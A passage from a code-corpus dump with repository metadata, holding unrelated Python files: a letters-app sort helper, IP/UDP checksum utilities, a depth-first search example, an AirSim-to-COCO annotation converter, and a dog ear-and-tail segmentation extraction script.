] | 5 | 2017-04-27T19:36:41.000Z | 2020-10-04T15:03:46.000Z | letters/sort_by.py | clairempr/letterpress | 05af199018b00ecff847789c71adbf9abc53b3a7 | [
"Apache-2.0"
] | 14 | 2017-06-17T14:12:34.000Z | 2022-03-11T23:15:32.000Z | letters/sort_by.py | clairempr/letterpress | 05af199018b00ecff847789c71adbf9abc53b3a7 | [
"Apache-2.0"
] | null | null | null | # Used for user-selected sort order
from letter_sentiment.custom_sentiment import get_custom_sentiments
DATE = 'DATE'
RELEVANCE = 'RELEVANCE'
SENTIMENT = 'SENTIMENT'
def get_selected_sentiment_id(filter_value):
if not filter_value.startswith(SENTIMENT):
return 0
    # slice off the prefix rather than using strip(): strip() removes
    # *characters*, not the prefix string, and would mangle unexpected values
    sentiment_id = int(filter_value[len(SENTIMENT):])
return sentiment_id
def get_sentiments_for_sort_by_list():
# Just sort by custom sentiment for now
custom_sentiments = [(SENTIMENT + str(sentiment.id), sentiment.name) for sentiment in get_custom_sentiments()]
return custom_sentiments
| 27.904762 | 114 | 0.773038 | 77 | 586 | 5.61039 | 0.428571 | 0.148148 | 0.087963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00202 | 0.15529 | 586 | 20 | 115 | 29.3 | 0.870707 | 0.12116 | 0 | 0 | 0 | 0 | 0.042969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.083333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
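# Illustrative: parsing user-selected sort filter values.
print(get_selected_sentiment_id("SENTIMENT12"))  # 12
print(get_selected_sentiment_id("DATE"))         # 0 (not a sentiment filter)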
9c8f54bbbfe1e98306867cca1e589d5209ed5cee | 1,419 | py | Python | core/pycopia/inet/packet/inet.py | kdart/pycopia | 1446fabaedf8c6bdd4ab1fc3f0ea731e0ef8da9d | [
"Apache-2.0"
] | 89 | 2015-03-26T11:25:20.000Z | 2022-01-12T06:25:14.000Z | core/pycopia/inet/packet/inet.py | kdart/pycopia | 1446fabaedf8c6bdd4ab1fc3f0ea731e0ef8da9d | [
"Apache-2.0"
] | 1 | 2015-07-05T03:27:43.000Z | 2015-07-11T06:21:20.000Z | core/pycopia/inet/packet/inet.py | kdart/pycopia | 1446fabaedf8c6bdd4ab1fc3f0ea731e0ef8da9d | [
"Apache-2.0"
] | 30 | 2015-04-30T01:35:54.000Z | 2022-01-12T06:19:49.000Z | """Internet packet basics.
Simple operations like performing checksums and swapping byte orders.
"""
# Copyright 1997, Corporation for National Research Initiatives
# written by Jeremy Hylton, jeremy@cnri.reston.va.us
#from _ip import *
import array
import struct
from socket import htons, ntohs
def cksum(s):
    # s is a bytes buffer; pad to an even length before viewing it as shorts
    if len(s) & 1:
        s = s + b'\0'
    words = array.array('h', s)
sum = 0
for word in words:
sum = sum + (word & 0xffff)
hi = sum >> 16
lo = sum & 0xffff
sum = hi + lo
sum = sum + (sum >> 16)
return (~sum) & 0xffff
# Should generalize from the *h2net patterns
# This python code is suboptimal because it is based on C code where
# it doesn't cost much to take a raw buffer and treat a section of it
# as a u_short.
def gets(s):
return struct.unpack('h', s)[0] & 0xffff
def mks(h):
return struct.pack('h', h)
def iph2net(s):
len = htons(gets(s[2:4]))
id = htons(gets(s[4:6]))
off = htons(gets(s[6:8]))
return s[:2] + mks(len) + mks(id) + mks(off) + s[8:]
def net2iph(s):
len = ntohs(gets(s[2:4]))
id = ntohs(gets(s[4:6]))
off = ntohs(gets(s[6:8]))
return s[:2] + mks(len) + mks(id) + mks(off) + s[8:]
def udph2net(s):
sp = htons(gets(s[0:2]))
dp = htons(gets(s[2:4]))
len = htons(gets(s[4:6]))
return mks(sp) + mks(dp) + mks(len) + s[6:]
def net2udph(s):
sp = ntohs(gets(s[0:2]))
dp = ntohs(gets(s[2:4]))
len = ntohs(gets(s[4:6]))
return mks(sp) + mks(dp) + mks(len) + s[6:]
| 22.887097 | 69 | 0.627907 | 262 | 1,419 | 3.39313 | 0.377863 | 0.073116 | 0.067492 | 0.031496 | 0.283465 | 0.152981 | 0.152981 | 0.152981 | 0.152981 | 0.152981 | 0 | 0.04458 | 0.193798 | 1,419 | 61 | 70 | 23.262295 | 0.732517 | 0.292459 | 0 | 0.102564 | 0 | 0 | 0.005045 | 0 | 0 | 0 | 0.024218 | 0 | 0 | 1 | 0.179487 | false | 0 | 0.076923 | 0.051282 | 0.435897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
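# Illustrative sanity check: the one's-complement checksum of a small
# bytes buffer (host byte order, matching the 'h' array typecode above).
data = b'\x45\x00\x00\x1c'
print(hex(cksum(data)))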
9c94c23785142e08b30342809bc3b549b76dac91 | 946 | py | Python | Graph/357 DFS on graph.py | ikaushikpal/DS-450-python | 9466f77fb9db9e6a5bb3f20aa89ba6332f49e848 | [
"MIT"
] | 3 | 2021-06-28T12:04:19.000Z | 2021-09-07T07:23:41.000Z | Graph/357 DFS on graph.py | SupriyoDam/DS-450-python | 5dc21ce61b3279e9bd9d6ef3ad236667227ca283 | [
"MIT"
] | null | null | null | Graph/357 DFS on graph.py | SupriyoDam/DS-450-python | 5dc21ce61b3279e9bd9d6ef3ad236667227ca283 | [
"MIT"
] | 1 | 2021-06-28T15:42:55.000Z | 2021-06-28T15:42:55.000Z | from collections import defaultdict
class Graph:
def __init__(self):
self.graph = defaultdict(list)
def addEdge(self, starting_vertex, end_vertex):
self.graph[starting_vertex].append(end_vertex)
    def dfs(self, starting_vertex):
        visitedVertices = defaultdict(bool)
        # snapshot the keys first: dfsUtil touches the defaultdict and may
        # add keys for sink vertices while we iterate
        for u in list(self.graph):
            if visitedVertices[u] == False:
                self.dfsUtil(u, visitedVertices)
def dfsUtil(self, starting_vertex, visitedVertices):
visitedVertices[starting_vertex] = True
        print(starting_vertex, end=', ')
for vertex in self.graph[starting_vertex]:
if visitedVertices[vertex] == False:
self.dfsUtil(vertex, visitedVertices)
g = Graph()
g.addEdge('A','B')
g.addEdge('B','D')
g.addEdge('A','C')
g.addEdge('C','D')
# g.addEdge('D','E')
# g.addEdge('E','F')
g.graph['G'] = []
g.dfs('A') | 24.894737 | 56 | 0.612051 | 114 | 946 | 4.964912 | 0.307018 | 0.173145 | 0.095406 | 0.081272 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242072 | 946 | 38 | 57 | 24.894737 | 0.7894 | 0.039112 | 0 | 0 | 0 | 0 | 0.01323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.16 | false | 0 | 0.04 | 0 | 0.24 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
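# Illustrative check of the traversal order on a fresh graph built the
# same way as the driver above.
import io, contextlib
g2 = Graph()
for a, b in [('A', 'B'), ('B', 'D'), ('A', 'C'), ('C', 'D')]:
    g2.addEdge(a, b)
g2.graph['G'] = []
buf = io.StringIO()
with contextlib.redirect_stdout(buf):
    g2.dfs('A')
assert buf.getvalue() == 'A, B, D, C, G, '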
9c98525fcb0d0b1802ff821f7d1db0119cf52338 | 10,149 | py | Python | src/tools/convert_airsimcam_to_coco.py | PhyllisH/CenterNet | dc17ed79329a7a8faeffbd44be85019b4779a371 | [
"MIT"
] | null | null | null | src/tools/convert_airsimcam_to_coco.py | PhyllisH/CenterNet | dc17ed79329a7a8faeffbd44be85019b4779a371 | [
"MIT"
] | null | null | null | src/tools/convert_airsimcam_to_coco.py | PhyllisH/CenterNet | dc17ed79329a7a8faeffbd44be85019b4779a371 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pickle
import json
import numpy as np
import math
import cv2
import os
import random
import matplotlib.pyplot as plt
from pyquaternion import Quaternion
import pycocotools.coco as coco
# DATA_PATH = '../../data/kitti/'
from nuscenes.nuscenes import NuScenes
from nuscenes.utils.data_classes import LidarPointCloud, RadarPointCloud, Box
from nuscenes.utils.geometry_utils import view_points, transform_matrix
train_split = ['scene_0', 'scene_1', 'scene_2', 'scene_3', 'scene_4', 'scene_5',
'scene_6', 'scene_8', 'scene_9', 'scene_10', 'scene_11', 'scene_12',
'scene_13', 'scene_14', 'scene_16', 'scene_17', 'scene_18', 'scene_19',
'scene_20', 'scene_21', 'scene_22', 'scene_23', 'scene_24', 'scene_26',
'scene_28', 'scene_29', 'scene_30', 'scene_31', 'scene_32', 'scene_33',
'scene_34', 'scene_35', 'scene_36', 'scene_37', 'scene_38', 'scene_39',
'scene_40', 'scene_42', 'scene_44', 'scene_45', 'scene_46', 'scene_47',
'scene_48', 'scene_49', 'scene_50', 'scene_51', 'scene_52', 'scene_53',
'scene_55', 'scene_56', 'scene_57', 'scene_61', 'scene_62', 'scene_63',
'scene_65', 'scene_66', 'scene_67', 'scene_68', 'scene_69', 'scene_70',
'scene_71', 'scene_72', 'scene_73', 'scene_75', 'scene_76', 'scene_77',
'scene_78', 'scene_79', 'scene_80', 'scene_81', 'scene_82', 'scene_83',
'scene_84', 'scene_87', 'scene_88', 'scene_90', 'scene_92', 'scene_94',
'scene_95', 'scene_97', 'scene_98', 'scene_99', 'scene_100', 'scene_101',
'scene_102', 'scene_103', 'scene_104', 'scene_105', 'scene_106', 'scene_107',
'scene_108', 'scene_109', 'scene_110', 'scene_111', 'scene_112', 'scene_113',
'scene_114', 'scene_116', 'scene_118', 'scene_119']
val_split = ['scene_7', 'scene_15', 'scene_25', 'scene_27', 'scene_41', 'scene_43',
'scene_54', 'scene_58', 'scene_59', 'scene_60', 'scene_64', 'scene_74',
'scene_85', 'scene_86', 'scene_89', 'scene_91', 'scene_93', 'scene_96',
'scene_115', 'scene_117']
def quaternion2euler(rotation):
w, x, y, z = rotation[0], rotation[1], rotation[2], rotation[3]
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z
def _get_rotation_matrix(translation, rotation):
roll, pitch, yaw = quaternion2euler(rotation)
c_y = np.cos(yaw)
s_y = np.sin(yaw)
c_r = np.cos(roll)
s_r = np.sin(roll)
c_p = np.cos(pitch)
s_p = np.sin(pitch)
matrix = np.matrix(np.identity(4))
matrix[0, 3] = translation[0]
matrix[1, 3] = translation[1]
matrix[2, 3] = translation[2]
matrix[0, 0] = c_p * c_y
matrix[0, 1] = c_y * s_p * s_r - s_y * c_r
matrix[0, 2] = -c_y * s_p * c_r - s_y * s_r
matrix[1, 0] = s_y * c_p
matrix[1, 1] = s_y * s_p * s_r + c_y * c_r
matrix[1, 2] = -s_y * s_p * c_r + c_y * s_r
matrix[2, 0] = s_p
matrix[2, 1] = -c_p * s_r
matrix[2, 2] = c_p * c_r
return matrix
def _get_vehicle_coord(anno_data):
translation = anno_data["translation"]
size = anno_data["size"]
a = size[0]
size[0] = size[1]
size[1] = a
rotation = anno_data["rotation"]
# cords the bounding box of a vehicle
cords = np.zeros((8, 4))
cords[0, :] = np.array([size[0] / 2, size[1] / 2, -size[2] / 2, 1])
cords[1, :] = np.array([-size[0] / 2, size[1] / 2, -size[2] / 2, 1])
cords[2, :] = np.array([-size[0] / 2, -size[1] / 2, -size[2] / 2, 1])
cords[3, :] = np.array([size[0] / 2, -size[1] / 2, -size[2] / 2, 1])
cords[4, :] = np.array([size[0] / 2, size[1] / 2, size[2] / 2, 1])
cords[5, :] = np.array([-size[0] / 2, size[1] / 2, size[2] / 2, 1])
cords[6, :] = np.array([-size[0] / 2, -size[1] / 2, size[2] / 2, 1])
cords[7, :] = np.array([size[0] / 2, -size[1] / 2, size[2] / 2, 1])
vehicle_world_matrix = _get_rotation_matrix(translation, rotation)
world_cords = np.dot(vehicle_world_matrix, np.transpose(cords))
return np.array(world_cords)
def get_2d_bounding_box(cords):
x_min = cords[0, 0]
x_max = cords[0, 0]
y_min = cords[1, 0]
y_max = cords[1, 0]
for i in range(1, 8):
if cords[0, i] < x_min:
x_min = cords[0, i]
if cords[0, i] > x_max:
x_max = cords[0, i]
if cords[1, i] < y_min:
y_min = cords[1, i]
if cords[1, i] > y_max:
y_max = cords[1, i]
return x_min, y_min, x_max - x_min, y_max - y_min
def convert_coco():
# data_dir = 'C:/Users/35387/Desktop/airsim_camera_demo'
data_dir = '/DB/rhome/shaohengfang/datasets/airsim/airsim_camera_10scene'
DEBUG = False
nusc = NuScenes(version='v1.0-mini', dataroot=data_dir, verbose=True)
cats = ['car', 'car_overlook']
splits = ['train', 'val']
scene_split = {'train': train_split, 'val': val_split}
cat_ids = {cat: i + 1 for i, cat in enumerate(cats)}
F = 400 # focal
H = 450 # height
W = 800 # width
camera_intrinsic = [[400.0, 0.0, 400.0],
[0.0, 400.0, 225.0],
[0.0, 0.0, 1.0]]
cat_info = []
for i, cat in enumerate(cats):
cat_info.append({'supercategory': 'vehicle', 'name': cat, 'id': i + 1})
image_id = 0
bbox_id = 0
for split in splits:
ret = {'images': [], "type": "instances", 'annotations': [], 'categories': cat_info}
for scene in nusc.scene:
if not scene["name"] in scene_split[split]:
continue
scene_token = scene['token']
cur_sample_token = scene['first_sample_token']
while cur_sample_token != "":
print(cur_sample_token)
cur_sample = nusc.get("sample", cur_sample_token)
# =======================
# execute the current sample data
anno_tokens = cur_sample["anns"]
# get the vehicle coords in global frame
vehicle_cords = []
for anno_token in anno_tokens:
anno_data = nusc.get("sample_annotation", anno_token)
vehicle_cords.append(_get_vehicle_coord(anno_data))
sample_data = cur_sample["data"]
sensors = list(sample_data.keys())
for sensor in sensors:
# image info
sensor_record = nusc.get("sample_data", sample_data[sensor])
image_id += 1
                    image_info = {'file_name': sensor_record['filename'],
                                  'id': image_id,
                                  'height': H,
                                  'width': W}  # 450x800: matches the camera intrinsics and the bbox clipping below
ret['images'].append(image_info)
# anno info
calibrated_record = nusc.get("calibrated_sensor", sensor_record["calibrated_sensor_token"])
im_position = calibrated_record["translation"]
im_position[2] = -im_position[2]
im_rotation = calibrated_record["rotation"]
im_rotation[3] = -im_rotation[3]
im_rotation = Quaternion(im_rotation)
cat_id = 1
if sensor[:10] == "CAM_BOTTOM":
cat_id = 2
for vehicle_cord in vehicle_cords:
flag = True
# get bbox from vehicle_cord
vehicle_cord_ = np.array(vehicle_cord)
vehicle_cord_ = vehicle_cord_[:3, :]
for j in range(3):
vehicle_cord_[j, :] = vehicle_cord_[j, :] - im_position[j]
vehicle_cord_[:3, :] = np.dot(im_rotation.rotation_matrix, vehicle_cord_[:3, :])
vehicle_cord_[:3, :] = np.dot(Quaternion([0.5, -0.5, 0.5, -0.5]).rotation_matrix.T,
vehicle_cord_[:3, :])
depths = vehicle_cord_[2, :]
for j in range(8):
if depths[j] < 0:
flag = False
if not flag:
continue
vehicle_points = view_points(vehicle_cord_[:3, :], np.array(camera_intrinsic), normalize=True)
x, y, w, h = get_2d_bounding_box(vehicle_points)
                        if x < 0 or y < 0 or (x + w) > W or (y + h) > H:
flag = False
if not flag:
continue
bbox_id += 1
ann = {'area': w * h,
'iscrowd': 0,
'image_id': image_id,
                               'bbox': [W - x - w, y, w, h],
'category_id': cat_id,
'id': bbox_id,
'ignore': 0,
'segmentation': []}
ret['annotations'].append(ann)
# =======================
cur_sample_token = cur_sample['next']
print("# images: ", len(ret['images']))
print("# annotations: ", len(ret['annotations']))
# out_path = 'C:/Users/35387/Desktop/airsim_camera_demo/airsim_instances_{}.json'.format(split)
out_path = '/DB/rhome/shaohengfang/model/CenterNet/data/airsim_camera/annotations/{}_instances.json'.format(split)
json.dump(ret, open(out_path, 'w'))
if __name__ == '__main__':
convert_coco()
| 42.822785 | 122 | 0.515913 | 1,354 | 10,149 | 3.600443 | 0.231167 | 0.01641 | 0.018051 | 0.019692 | 0.157538 | 0.099487 | 0.070359 | 0.05641 | 0.05641 | 0.049846 | 0 | 0.076296 | 0.33491 | 10,149 | 236 | 123 | 43.004237 | 0.645926 | 0.03961 | 0 | 0.035533 | 0 | 0 | 0.158241 | 0.017468 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025381 | false | 0 | 0.081218 | 0 | 0.126904 | 0.020305 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
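# Illustrative sanity check of the generated annotations (the path below
# is hypothetical; substitute the out_path used in convert_coco).
from pycocotools.coco import COCO
coco_gt = COCO('/path/to/annotations/train_instances.json')
print(len(coco_gt.getImgIds()), 'images;', len(coco_gt.getAnnIds()), 'annotations')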
9c9a821cc281b228396f8b843b5b439e1cb8ce61 | 14,355 | py | Python | dataset_production/extract_ear_tail_segmentations.py | OllieBoyne/dog-dynamics | c472f984cb04e6dea932be6a42f4daaf174fb44c | [
"Apache-2.0"
] | 1 | 2020-10-04T18:40:23.000Z | 2020-10-04T18:40:23.000Z | dataset_production/extract_ear_tail_segmentations.py | OllieBoyne/dog-dynamics | c472f984cb04e6dea932be6a42f4daaf174fb44c | [
"Apache-2.0"
] | null | null | null | dataset_production/extract_ear_tail_segmentations.py | OllieBoyne/dog-dynamics | c472f984cb04e6dea932be6a42f4daaf174fb44c | [
"Apache-2.0"
] | null | null | null | """Scripts for second stage of labelling - ear and tail segmentations"""
from vis.utils import *
from dataset_production.mturk_processor import *
from scipy.ndimage import center_of_mass as COM
from matplotlib import colors
def extract_colours(rgb_array):
"""Given an array of (r,g,b) values, returns list of unique colours"""
return np.unique(rgb_array.reshape(-1, rgb_array.shape[2]), axis=0)
def hex_to_rgb(hex):
return np.array([int(hex[i:i + 2], 16) for i in (0, 2, 4)])
def hex_to_unit_rgb(hex):
out = np.array([int(hex[i:i + 2], 16) for i in (0, 2, 4)])
if out.max() > 1:
out = out / 255 # convert to r, g, b values between 0 and 1
return out
def rgb_to_bin(rgb, t=0.1):
"""Make rgb into binary mask array"""
gs = np.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140])
return gs > (gs.max() * t)
def extract_segmentations(images_dir, segment_loc, plot_entries=False, plot_rejects=False, plot_seg=False,
plot_vis=False,
reject_by_entry=True, reject_by_correlation=True, **kwargs):
"""Given a results csv of images and their marked silhouettes, collect and average all of them.
Produce output JSON in correct order, with numpy arrays of """
data = {} # data to be dict of img_src: [labelled_keypoints]
data_by_row = {} # dict of n_row : (img, segment_uri)
out_dir = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\ear_tail_segments"
src_keypoints = joinp(out_dir, "keypoints_base.json")
input_data = json.load(open(src_keypoints, "r")) # load existing data
tt = np.load(joinp(out_dir, "splits_base.npz"))
train, val = list(tt["train_list"]), list(tt["val_list"])
# Create sub directories if necessary
try_mkdir(out_dir)
results_loc = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\results_ear_tail.csv"
with open(results_loc, "r") as infile:
reader = csv.reader(infile)
headers = next(reader)
for n_row, line in enumerate(reader):
*_, img, height, width, segment_uri, status = get_columns(headers, line, "img",
"img_height",
"img_width", "segment", "status")
if n_row == 0:
# define dicitonary of name : colour
seg_names = ["Left ear tip", "Right ear tip", "Left ear", "Right ear", "Tail"]
colour_assignments = get_columns(headers, line, *seg_names)
if status != "Rejected":
data[img] = data.get(img, []) + [(n_row, segment_uri)] # add to dictionary, store row of operation
data_by_row[n_row] = (img, segment_uri)
p = tqdm.tqdm(total=len(input_data))
n_succ, n_errors = 0, 0
n_ear_tips_labelled = 0
for index, entry in enumerate(input_data):
no_error = True
img_src = entry["img_path"]
W, H = entry["img_width"], entry["img_height"]
keypoints = entry["joints"]
img_data = plt.imread(os.path.join(images_dir, img_src), format="jpg")
H, W, _ = img_data.shape
if img_src not in data:
no_error = False
elif len([i for i in keypoints if i != [0, 0, 0]]) < 5:
no_error = False
else:
segments = data[img_src]
segment_data = {}
for n, (n_row, segment_uri) in enumerate(segments):
segment_rgb = (read_uri(segment_uri)[:, :, :3] * 255).astype(np.int16) # get as rgb
# separate by colour
# colours = extract_colours(segment_rgb)
for i, hex_col in enumerate(colour_assignments):
name = seg_names[i]
colour = hex_to_rgb(hex_col[1:])
                    indices_list = np.all(segment_rgb == colour, axis=-1)  # a pixel matches only if all three channels match
this_channel = np.zeros((H, W))
this_channel[indices_list] = True
segment_data[name] = segment_data.get(name, []) + [this_channel]
# Average across segments to produce binary mask
for seg_name in segment_data:
segment_data[seg_name] = np.mean(segment_data[seg_name], axis=0) > 0.5
# add ears to keypoint
r_ear = COM(segment_data["Right ear tip"])[::-1]
l_ear = COM(segment_data["Left ear tip"])[::-1]
ear_tips = False
for ear in (r_ear, l_ear):
if any(np.isnan(i) for i in ear):
entry["joints"].append([0, 0, 0])
else:
entry["joints"].append([*ear, 1])
ear_tips = True
entry["ear_tips_labelled"] = ear_tips
n_ear_tips_labelled += ear_tips
main_segment = plt.imread(joinp(images_dir, "segments", "segs", img_src)) # segmentation of main body
# OUTPUT ARRAY with 0 for nothing, 1 for main dog, 2 for left ear, 3 for right ear, 4 for tail
segment_out = np.zeros((H, W))
segment_out[rgb_to_bin(main_segment, t=0.5)] = 1
segment_out[segment_data["Left ear"]] = 2
segment_out[segment_data["Right ear"]] = 3
segment_out[segment_data["Tail"]] = 4
folder = img_src.split("/")[0]
try_mkdir(joinp(out_dir, "segs", folder))
np.save(joinp(out_dir, "segs", img_src.replace("jpg", "npy")), segment_out.astype(np.int16))
if no_error:
n_succ += 1
else:
if index in train: train.remove(index)
if index in val: val.remove(index)
n_errors += 1
if len(entry["joints"]) < 20:
entry["joints"] += [[0, 0, 0]] * (len(entry["joints"]) - 20)
p.update()
p.set_description(f"Success: {n_succ}, Errors: {n_errors}, n_ET = {n_ear_tips_labelled}")
with open(joinp(out_dir, "keypoints_filtered.json"), "w") as outfile:
json.dump(input_data, outfile)
np.save(joinp(out_dir, "train.npy"), train)
np.save(joinp(out_dir, "val.npy"), val)
def get_variation_by_keypoint(images_dir, keypoints_loc, keypoint_list, **kwargs):
"""Produce a dictionary of size (N_keypoints, X, 2) which gives the deviations of each keypoint in each frame
from the mean."""
    output_data = {}  # dict of keypoint index: [(dx, dy), ...] deviations from the mean position
filtered_json_src = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\ear_tail_segments\keypoints_filtered.json"
filtered_json = {i["img_path"]: i for i in json.load(open(filtered_json_src))}
data = {} # data to be dict of img_src: [labelled_keypoints]
segment_worker_data = {} # data to be dict of img_src: segment data
img_sizes = {} # data to be dict of img_src: (width, height)
# load normal keypoints
with open(keypoints_loc, "r") as infile:
reader = csv.reader(infile)
headers = next(reader)
for line in reader:
*_, img, is_multiple_dogs, height, width, answers, status = get_columns(headers, line, "img",
"multiple_dogs", "img_height",
"img_width", "answer", "status")
# answers originally an array of dicts, where each dict has keys label, x and y
# convert to a single dict, with format label: (x,y)
answers = eval(answers)
if status != "Rejected":
answer_dict = {i["label"]: (i["x"], i["y"]) for i in answers}
data[img] = data.get(img, []) + [answer_dict] # add to dictionary
img_sizes[img] = (int(width), int(height))
# load ear tail keypoints
results_loc = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\results_ear_tail.csv"
with open(results_loc, "r") as infile:
reader = csv.reader(infile)
headers = next(reader)
for n_row, line in enumerate(reader):
*_, img, height, width, segment_uri, status = get_columns(headers, line, "img",
"img_height",
"img_width", "segment", "status")
if n_row == 0:
# define dicitonary of name : colour
seg_names = ["Left ear tip", "Right ear tip", "Left ear", "Right ear", "Tail"]
colour_assignments = get_columns(headers, line, *seg_names)
if status != "Rejected":
segment_worker_data[img] = segment_worker_data.get(img, []) + [
(n_row, segment_uri)] # add to dictionary, store row of operation
# For now, load all data from any assignments, and just average any data to form the basis for the actual plot.
# Scheme to dismiss points:
# If labelled in only 1 dataset, dismiss
# If labelled in only 2 datasets, if rms error > threshold, dismiss
# If labelled in 3 datasets, if rms error > threshold, dismiss
# If in any case, not dismissed, final position is the average of any datasets
progress_bar = tqdm.tqdm(total=len(data))
# Declare figures outside of loop, to minimise memory wastage of creating thousands of figures
for img, answers in list(data.items()):
if img not in filtered_json:
progress_bar.update()
continue # skip any not in final json
entry = filtered_json[img]
# Set thresholds for deciding if data set is valid
width, height = entry["img_width"], entry["img_height"]
threshold = (width + height) / 80
image_keypoint_data = dict(img_path=img, img_width=width, img_height=height,
joints=[]) # place data here for .json output
joint_data = {} # dict of joint : (mean_x, mean_y, visibility) for all keypoints
for i, keypoint_label in enumerate(keypoint_list):
colour = colours[keypoint_label] # get colour (ignoring hidden command)
if any(keypoint_label + " (hidden)" in answer for answer in answers):
keypoint_label = keypoint_label + " (hidden)" # change keypoint name to reflect this
if [answer.get(keypoint_label) for answer in answers if keypoint_label in answer] == []:
continue
all_xs, all_ys = zip(
*[answer.get(keypoint_label) for answer in answers if keypoint_label in answer]) # Get all non blank xs
mean_x, mean_y = mean(all_xs), mean(all_ys)
n_valid = len(all_xs)
discard = False
if n_valid == 1:
# For now, if fewer than 3 submitted, accept 1x n_valid. Change this later when dataset is finished
discard = len(answers) >= 3
while n_valid > 2:
if rms(all_xs, all_ys) > threshold:
# Discard worst point and try as 2 data points
n_dis = most_anomalous(all_xs, all_ys)
all_xs, all_ys = all_xs[:n_dis] + all_xs[n_dis + 1:], all_ys[:n_dis] + all_ys[n_dis + 1:]
mean_x, mean_y = mean(all_xs), mean(all_ys)
n_valid -= 1
else:
break
for n, (x, y) in enumerate(zip(all_xs, all_ys)):
if x != 0 and y != 0:
output_data[i] = output_data.get(i, []) + [(x - mean_x, y - mean_y)]
# Get ear tips data
if img not in segment_worker_data:
progress_bar.update()
continue
segments = segment_worker_data[img]
segment_data = {}
for n, (n_row, segment_uri) in enumerate(segments):
segment_rgb = (read_uri(segment_uri)[:, :, :3] * 255).astype(np.int16) # get as rgb
## separate by colour
# colours = extract_colours(segment_rgb)
for i, hex_col in enumerate(colour_assignments):
name = seg_names[i]
colour = hex_to_rgb(hex_col[1:])
                indices_list = np.all(segment_rgb == colour, axis=-1)  # a pixel matches only if all three channels match
this_channel = np.zeros((height, width))
this_channel[indices_list] = True
segment_data[name] = segment_data.get(name, []) + [this_channel]
r_ears = [COM(i) for i in segment_data["Right ear tip"]]
l_ears = [COM(i) for i in segment_data["Left ear tip"]]
# Average across segments to produce binary mask
segment_data_mean = {}
for seg_name in segment_data:
segment_data_mean[seg_name] = np.mean(segment_data[seg_name], axis=0) > 0.5
# add ears to keypoint
r_ear_mean = COM(segment_data_mean["Right ear tip"])
l_ear_mean = COM(segment_data_mean["Left ear tip"])
if entry["ear_tips_labelled"]:
for ear_idx in [0, 1]:
mean_y, mean_x = [r_ear_mean, l_ear_mean][ear_idx]
ear_tip = [r_ears, l_ears][ear_idx]
for (y, x) in ear_tip:
if not np.isnan(x) and not np.isnan(y):
idx = 18 + ear_idx
output_data[idx] = output_data.get(idx, []) + [(x - mean_x, y - mean_y)]
progress_bar.update()
with open(r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\variation_by_keypoint.json",
"w") as outfile:
json.dump(output_data, outfile)
def plot_keypoint_heatmaps():
"""Produce plot of variation for each keypoint on to an annotated dog image"""
data_src = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\variation_by_keypoint.json"
data = json.load(open(data_src, "r"))
img_dir = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset" # select another
img_src = r"n02091244-Ibizan_hound/n02091244_3373.jpg"
img = plt.imread(joinp(img_dir, img_src))
# Load keypoints
keypoint_src = r"E:\IIB Project Data\Training data sets\Dogs\Full dog dataset\ear_tail_segments\keypoints_filtered.json"
# # USE THIS CODE BLOCK TO FIND IMAGES WITH A GOOD NUMBER OF KEYPOINTS LABELLED
# for i in json.load(open(keypoint_src)):
# keypoints = i["joints"]
# n_k = len([x for x in keypoints if x != [0.0, 0.0, 0.0]])
# if n_k == 20:
# plt.imshow(plt.imread(joinp(img_dir, i["img_path"])))
# plt.title(i["img_path"])
# print(i["img_path"])
# plt.show()
img_entry = [i for i in json.load(open(keypoint_src)) if i["img_path"] == img_src][0]
keypoint_data = img_entry["joints"]
X, Y, V = [list(i) for i in zip(*keypoint_data)]
H, W = img_entry["img_height"], img_entry["img_width"]
dpi = 300
fig, ax = plt.subplots(figsize=(W / dpi, H / dpi))
ax.imshow(img)
pix_width = 20.5 # search range for bins
for n in range(20):
d = data[str(n)]
d = [(x, y) for (x, y) in d if not np.isnan(x) and not np.isnan(y)]
if n >= 18: # switch x and y for n >= 18 due to error in ear tips
X[n], Y[n] = Y[n], X[n]
if X[n] != 0:
x_hist, y_hist = zip(*d)
